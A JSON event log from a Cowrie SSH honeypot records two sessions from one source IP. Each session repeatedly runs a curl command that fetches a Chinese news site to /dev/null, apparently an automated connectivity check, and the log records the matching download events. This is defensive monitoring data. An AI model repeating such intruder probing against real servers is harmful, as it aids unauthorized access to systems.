{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.788993Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.793767Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.811768Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.812614Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.819445Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.820188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.829978Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.832806Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.844690Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.849838Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.850629Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.854532Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.855376Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.885847Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.887448Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.888095Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.891943Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.892596Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.896101Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.909435Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.926237Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.927361Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.928067Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.931105Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.932013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.934144Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.944788Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.946317Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.965658Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.966472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:28.969276Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.970393Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.979849Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:28.993680Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.002927Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.006155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.007055Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.010466Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.011054Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.025321Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.045348Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.046053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.048735Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.049753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.084488Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.085389Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.087334Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.088161Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.119936Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.120724Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.125566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.126560Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.152717Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.154768Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.155603Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.165421Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.166078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.191488Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.192199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.196473Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.199879Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.202070Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.202706Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.211939Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.225930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.226585Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.233593Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.238537Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.239468Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.261017Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.261691Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.264636Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.268032Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.277424Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.278037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.293488Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.297073Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.297676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.307078Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.317276Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.317904Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.321239Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.329951Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.331451Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
